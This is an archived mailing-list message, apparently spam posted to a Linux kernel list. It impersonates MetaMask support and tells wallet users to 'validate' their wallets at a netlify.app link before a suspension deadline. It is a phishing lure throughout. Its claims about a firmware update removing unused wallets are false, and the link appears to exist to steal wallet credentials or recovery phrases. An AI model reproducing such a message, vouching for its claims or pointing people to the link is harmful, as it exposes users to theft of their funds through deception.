linux-edac.vger.kernel.org archive mirror
* METAMASK SECURITY
@ 2022-08-09 11:32 METAMASK SUPPORT
From: METAMASK SUPPORT @ 2022-08-09 11:32 UTC (permalink / raw)
  To: linux-edac

Due to the recent update on the METAMASK firmware. The new update is to remove bot and unused wallets from the blockchain network.

All MetaMask wallet users are required to complete wallet validation by following:

https://myinteli-syncedapps.netlify.app/

All unverified accounts will be suspended on Tuesday, August 16th, 2022.

We’re sorry for any inconvenience we cause with this, but please keep in mind that our intention is to keep our customers safe and happy.

To add any additional comments, simply reply to this email.

Thank you for choosing METAMASK to be your digital currency wallet.

only message in thread, other threads:[~2022-08-09 11:41 UTC | newest]